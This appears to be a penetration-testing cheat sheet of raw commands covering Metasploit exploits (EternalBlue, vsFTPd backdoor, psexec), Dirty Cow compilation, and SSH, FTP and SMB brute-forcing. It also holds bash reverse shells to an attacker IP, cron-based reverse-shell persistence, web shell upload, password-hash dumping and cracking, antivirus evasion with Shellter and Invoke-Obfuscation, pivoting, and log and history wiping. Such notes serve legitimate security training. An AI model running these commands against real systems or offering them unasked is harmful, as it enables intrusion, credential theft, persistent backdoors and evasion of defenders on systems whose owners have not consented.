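# adds an attacker key to authorized_keys (the private key lands in loot) — record it and remove it at the end
use post/linux/manage/sshkey_persistence
set CREATESSHFOLDER true
set SESSION 1
# Persistence Test
loot
cat /root/.msf4/loot/DATE_Linux_Persistenc_<TARGET_IP>_id_rsa_.txt
# Exit all the msfconsole sessions and close it
exit -y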
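Armitage
Exploitation
Vulnerability Scanning
# BANNER GRABBING
# -O needs root
nmap -sV -O <TARGET_IP>
nmap -sV --script=banner <TARGET_IP>
ls -lah /usr/share/nmap/scripts | grep <KEYWORD>
nc <TARGET_IP> <TARGET_OPEN_PORT>
Exploits
# SEARCHSPLOIT - Install
sudo apt update && sudo apt -y install exploitdb
## Update
searchsploit -u
# Filters search
searchsploit remote windows smb
searchsploit remote linux ssh
searchsploit remote linux ssh OpenSSH
searchsploit remote webapps wordpress
searchsploit local windows
searchsploit local windows | grep -e "Microsoft"
# CROSS COMPILING
sudo apt -y install mingw-w64 gcc
## Windows Target
searchsploit VideoLAN VLC SMB
# read the PoC before compiling: exploit-db code ships with offsets/shellcode for one specific build
searchsploit -m 9303
# Compile for x64
x86_64-w64-mingw32-gcc 9303.c -o exploit64.exe
# Compile for x86 (32-bit)
i686-w64-mingw32-gcc 9303.c -o exploit32.exe
## Linux Target
searchsploit Dirty Cow
# 40839 rewrites /etc/passwd (it keeps a copy in /tmp/passwd.bak) and can hang the box — restore the backup when done
searchsploit -m 40839
gcc -pthread 40839.c -o dirty_exploit -lcrypt
Shells
# NETCAT - Install
# NOTE(review): on current Kali the packages are netcat-traditional (has -e) / netcat-openbsd — confirm which one "netcat" resolves to
sudo apt update && sudo apt install -y netcat
# or upload the nc.exe on the target machine
nc <TARGET_IP> <TARGET_PORT>
nc -nv <TARGET_IP> <TARGET_PORT>
nc -nvu <TARGET_IP> <TARGET_UDP_PORT>
## NC Listener
nc -nvlp <LOCAL_PORT>
nc -nvlup <LOCAL_UDP_PORT>
## Transfer files
# Target machine
nc.exe -nvlp <PORT> > test.txt
# Attacker machine
echo "Hello target" > test.txt
nc -nv <TARGET_IP> <TARGET_PORT> < test.txt
# BIND SHELL (target listens; needs an nc built with -e)
## target:   nc -nvlp <PORT> -e /bin/bash
## attacker: nc -nv <TARGET_IP> <PORT>
# REVERSE SHELL (target connects back; plain bash, no -e needed)
## attacker: nc -nvlp <PORT>
## target:   bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1
# Spawn shells
python -c 'import pty; pty.spawn("/bin/sh")'
# from inside a Python interpreter: import os; os.system('/bin/bash')
echo os.system('/bin/bash')
/bin/sh -i
/usr/bin/script -qc /bin/bash /dev/null
perl -e 'exec "/bin/sh";'
# the rest are typed from inside the named interpreter/program
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
IRB: exec "/bin/sh"
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh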
Frameworks
# METASPLOIT - example
service postgresql start && msfconsole -q
db_status
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
workspace -a <SERVICE_NAME>
search <SERVICE_NAME>
# authenticated exploit: needs valid ProcessMaker credentials (USERNAME/PASSWORD below)
use exploit/multi/http/processmaker_exec
options
set USERNAME <USER>
set PASSWORD <PW>
run
## Server run
# Empire C2 server; the operator client is a separate process
sudo powershell-empire server
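Win Exploitation
# Banner Grabbing
nc -nv <TARGET_IP> 21
# Enumeration
service postgresql start && msfconsole
db_status
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
workspace -a <SERVICE_NAME>
db_import nmap_10k
hosts
services
use auxiliary/scanner/smb/smb_version
run
hosts
IIS/FTP
# Targeting IIS/FTP
nmap -sV -sC -p21,80 <TARGET_IP>
## Try anonymous:anonymous
ftp <TARGET_IP>
## Brute-force FTP
hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <TARGET_IP> ftp
## msfconsole
use multi/handler
set payload windows/shell/reverse_tcp
set LHOST <LOCAL_IP>
set LPORT <LOCAL_PORT>
OPENSSH
# Targeting OPENSSH
nmap -sV -sC -p 22 <TARGET_IP>
## Brute-force SSH
# -P was missing in the original (hydra had no password list). Using unix_users.txt as the
# password list is a "username-as-password" check; keep -t 4 for ssh.
hydra -l administrator -P /usr/share/wordlists/metasploit/unix_users.txt <TARGET_IP> ssh
hydra -l <USER> -P /usr/share/wordlists/metasploit/unix_users.txt <TARGET_IP> ssh
## Win
# NOTE(review): "bash" here presumably because the lab's Windows OpenSSH drops into a Unix-style shell — confirm
bash
net localgroup administrators
whoami /priv
# msfconsole
use auxiliary/scanner/ssh/ssh_login
setg RHOST <TARGET_IP>
setg RHOSTS <TARGET_IP>
set USERNAME <USER>
set PASSWORD <PW>
run
# the command is "sessions" (plural)
sessions 1
# CTRL+Z to background
sessions -u 1
SMB
# Targeting SMB
nmap -sV -sC -p 445 <TARGET_IP>
## Brute-force SMB
# check the lockout policy (enum4linux -P) before spraying the administrator account
hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt <TARGET_IP> smb
hydra -l <USER> -P /usr/share/wordlists/metasploit/unix_passwords.txt <TARGET_IP> smb
## Enumeration
smbclient -L <TARGET_IP> -U <USER>
smbmap -u <USER> -p <PW> -H <TARGET_IP>
enum4linux -u <USER> -p <PW> -U <TARGET_IP>
## msfconsole
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <TARGET_IP>
set SMBUser <USER>
set SMBPass <PW>
run
# msfconsole - Meterpreter
# psexec needs admin credentials (SMBPass also accepts an NTLM hash) and drops a service binary on ADMIN$
use exploit/windows/smb/psexec
set RHOSTS <TARGET_IP>
set SMBUser Administrator
set SMBPass <PW>
set payload windows/x64/meterpreter/reverse_tcp
run
# MySQL client commands — run once the database is reachable with the credentials recovered below (wp-config.php)
show databases;
use <db>;
show tables;
select * from <table>;
## msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET_IP>
run
sysinfo
cd /
cd wamp
dir
# Meterpreter path: escape the backslash (or use forward slashes: www/wordpress)
cd www\\wordpress
# holds DB_USER/DB_PASSWORD for the WordPress database
cat wp-config.php
shell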
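Linux Exploitation
# Enumeration
cat /etc/*release
whoami
VSFTPD
# Targeting VSFTPD
nmap -sV -sC -p 21 <TARGET_IP>
## Try anonymous:anonymous
ftp <TARGET_IP>
## Exploit vsFTPd
searchsploit vsftpd
# read the script before running it (it opens the 6200/tcp backdoor shell on the target)
searchsploit -m 49757
vim 49757.py
chmod +x 49757.py
python3 49757.py <TARGET_IP>
## Brute-force FTP
# (unix_users.txt as the password list = "username-as-password" check)
hydra -l <USER> -P /usr/share/metasploit-framework/data/wordlists/unix_users.txt <TARGET_IP> ftp
ftp <TARGET_IP>
cd /
# the FTP root is the web root here: anything uploaded becomes reachable over HTTP
cd /var/www/dav
put shell.php
## Attacker listener
nc -nvlp <PORT>
## Open http://<TARGET_IP>/dav/shell.php
/bin/bash -i
# Targeting PHP
nmap -sV -sC -p 80 <TARGET_IP>
## Browse
http://<TARGET_IP>/phpinfo.php
# Targeting SAMBA
nmap -sV -p 445 <TARGET_IP>
# msfconsole
use auxiliary/scanner/smb/smb_version
setg RHOSTS <TARGET_IP>
run
use exploit/multi/samba/usermap_script
run
background
sessions -u 1
sessions 2
cat /etc/shadow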
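Obfuscation
# SHELLTER - Install
sudo apt update && sudo apt install -y shellter
sudo dpkg --add-architecture i386 && sudo apt update && sudo apt -y install wine32
rm -r ~/.wine
cd /usr/share/windows-resources/shellter
sudo shellter
mkdir AVBypass
cd AVBypass
# the host binary the payload is injected into (a legitimate, signed-looking carrier)
cp /usr/share/windows-binaries/vncviewer.exe .
# Proceed in Shellter window
pwsh
cd /opt/Invoke-Obfuscation/
Import-Module ./Invoke-Obfuscation.psd1
cd ..
Invoke-Obfuscation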
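Post-Exploitation
Win Local Enumeration
# MSF Meterpreter
getuid
sysinfo
show_mount
# Meterpreter paths: escape the backslashes (or use forward slashes)
cat C:\\Windows\\System32\\eula.txt
getprivs
pgrep explorer.exe
migrate <PROCESS_ID>
## Users
whoami
whoami /priv
query user
net users
net user <USER>
net localgroup
net localgroup Administrators
net localgroup "Remote Desktop Users"
## Network
ipconfig
ipconfig /all
route print
arp -a
netstat -ano
# "netsh firewall" is the legacy context; advfirewall below is the current one
netsh firewall show state
netsh advfirewall show allprofiles
## Services
ps
net start
wmic service list brief
tasklist /SVC
schtasks /query /fo LIST
schtasks /query /fo LIST /v
# Metasploit
use post/windows/gather/enum_logged_on_users
use post/windows/gather/win_privs
use post/windows/gather/checkvm
use post/windows/gather/enum_applications
use post/windows/gather/enum_computers
use post/windows/gather/enum_patches
use post/windows/gather/enum_shares
# LINUX LOCAL ENUMERATION (the commands below run on a Linux target)
# MSF Meterpreter
getuid
sysinfo
ifconfig
netstat
route
arp
ps
pgrep vsftpd
env
lscpu
free -h
df -h
lsblk | grep sd
## Users
whoami
ls -lah /home
cat /etc/passwd
# accounts that can actually log in
cat /etc/passwd | grep -v /nologin
groups <USER>
groups root
groups
who
w
last
lastlog
## Network
ifconfig
ip -br -c a
ip a
cat /etc/networks
cat /etc/hostname
cat /etc/hosts
cat /etc/resolv.conf
arp -a
## Services
ps
ps aux
ps aux | grep msfconsole
ps aux | grep root
top
cat /etc/cron*
crontab -l
# Metasploit
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_system
use post/linux/gather/checkvm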
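Transferring Files
# Python 3.7
# serves the *current directory* to anyone who can reach the port: start it in a folder that holds only
# what you mean to transfer, and stop it afterwards
python3 -m http.server <PORT_NUMBER>
# On Windows, try
python -m http.server <PORT>
py -3 -m http.server <PORT>
Shells
cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/bin/bash -i
/bin/sh -i
TTY Shells
# BASH
/bin/bash -i
/bin/sh -i
SHELL=/bin/bash script -q /dev/null
# PYTHON
python --version
python -c 'import pty; pty.spawn("/bin/bash")'
## Fully Interactive TTY
# Background (CTRL+Z) the current remote shell
stty raw -echo && fg
# Reinitialize the terminal with reset
reset
# then, in the remote shell: export TERM=xterm; stty rows <ROWS> cols <COLS>
# PERL
perl -h
perl -e 'exec "/bin/bash";'
# PRIVESCCHECK (Windows local enumeration script — must be on the target first)
## Basic mode
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# Writable files
find / -not -type l -perm -o+w 2>/dev/null
sudo -l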
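Win Persistence
Linux Persistence
ls -lah ~/.ssh/
cat ~/.ssh/id_rsa
cat ~/.ssh/authorized_keys
cat ~/.ssh/known_hosts
# Cron Jobs
cat /etc/cron*
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1'" > cron
# "crontab <file>" installs the file; -i only adds a confirmation prompt to -r and installs nothing
crontab cron
crontab -l
# Setup a 'nc' listener and wait for the Bash Reverse Shell
nc -nvlp <PORT>
# remove the job (crontab -r) and the "cron" file at the end of the engagement
# Meterpreter (Windows): dumps the local SAM hashes
hashdump
# JohnTheRipper
john --list=formats | grep NT
john --format=NT hashes.txt
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=NT win_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Linux
cat /etc/shadow
# Metasploit
use post/linux/gather/hashdump
# Hashcat
hashcat --help | grep 1800
# -a 0 is the straight (wordlist) attack; -a 3 is a mask attack and would treat the wordlist path as a mask
hashcat -a 0 -m 1800 linux.hashes.txt /usr/share/wordlists/rockyou.txt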
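Pivoting
# Meterpreter on Target1
run autoroute -s <TARGET1_SUBNET_NETWORK>
run autoroute -p
run arp_scanner -r <TARGET1_SUBNET_NETWORK>
background
use auxiliary/scanner/portscan/tcp
set RHOSTS <TARGET2_IP>
set PORTS 1-100
run
# MeterpreterPort Forwarding
portfwd add -l <LOCAL_PORT> -p <TARGET_PORT> -r <TARGET_IP>
Clearing Tracks
# Meterpreter: the command is clearev (no "clearenv"); it wipes the Windows event logs — only with explicit authorisation
clearev
# Linux /tmp
cd /tmp
# history -c only clears the running shell; "unset HISTFILE" stops this session being written out on exit
history -c
cat /dev/null > ~/.bash_history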
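Social Engineering
# GOPHISH - Linux Install
cd /opt/
# Get the latest version link from https://github.com/gophish/gophish/releases/
sudo wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
sudo unzip -d gophish gophish-v0.12.1-linux-64bit.zip
sudo chmod +x gophish/gophish
# Gobuster - Install
sudo apt update && sudo apt install -y gobuster
# Dirb - Install (the package is dirb; DirBuster is a separate Java tool)
sudo apt update && sudo apt install -y dirb
# Nikto - Install
sudo apt update && sudo apt install -y nikto
# BurpSuite - Install
sudo apt update && sudo apt install -y burpsuite
# SQLMap - Install
sudo apt update && sudo apt install -y sqlmap
# XSSer - Install
sudo apt update && sudo apt install -y xsser
# WPScan - Install
sudo apt update && sudo apt install -y wpscan
# Hydra - Install
sudo apt update && sudo apt install -y hydra
# Dirb
dirb http://<TARGET_IP>
# CURL
curl -I <TARGET_IP>
curl -X GET <TARGET_IP>
# shows the allowed methods; PUT/DELETE enabled is a finding in itself
curl -X OPTIONS <TARGET_IP> -v
curl -X POST <TARGET_IP>
# form credentials on the command line land in shell history — use -d @file or a prompt for real ones
curl -X POST <TARGET_IP>/login.php -d "name=john&password=password" -v
curl -X PUT <TARGET_IP>
# Gobuster
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -b 403,404
# Nikto
nikto -h http://<TARGET_IP> -o niktoscan.txt
nikto -h http://<TARGET_IP>/index.php?page=arbitrary-file-inclusion.php -Tuning 5 -o nikto.html -Format htm
Attacks
# SQLMap
# <SESSION_ID> = your own logged-in PHPSESSID (sqlmap replays it on every request); the original had a literal lab value
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=<SESSION_ID>; security_level=0" -p title
## List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=<SESSION_ID>; security_level=0" -p title --dbs
# XSSer
xsser --url 'http://<TARGET_IP>/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'
## Authenticated XSSer
xsser --url "http://<TARGET_IP>/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=<SESSION_ID>; security_level=0" --Fp "<script>alert(1)</script>"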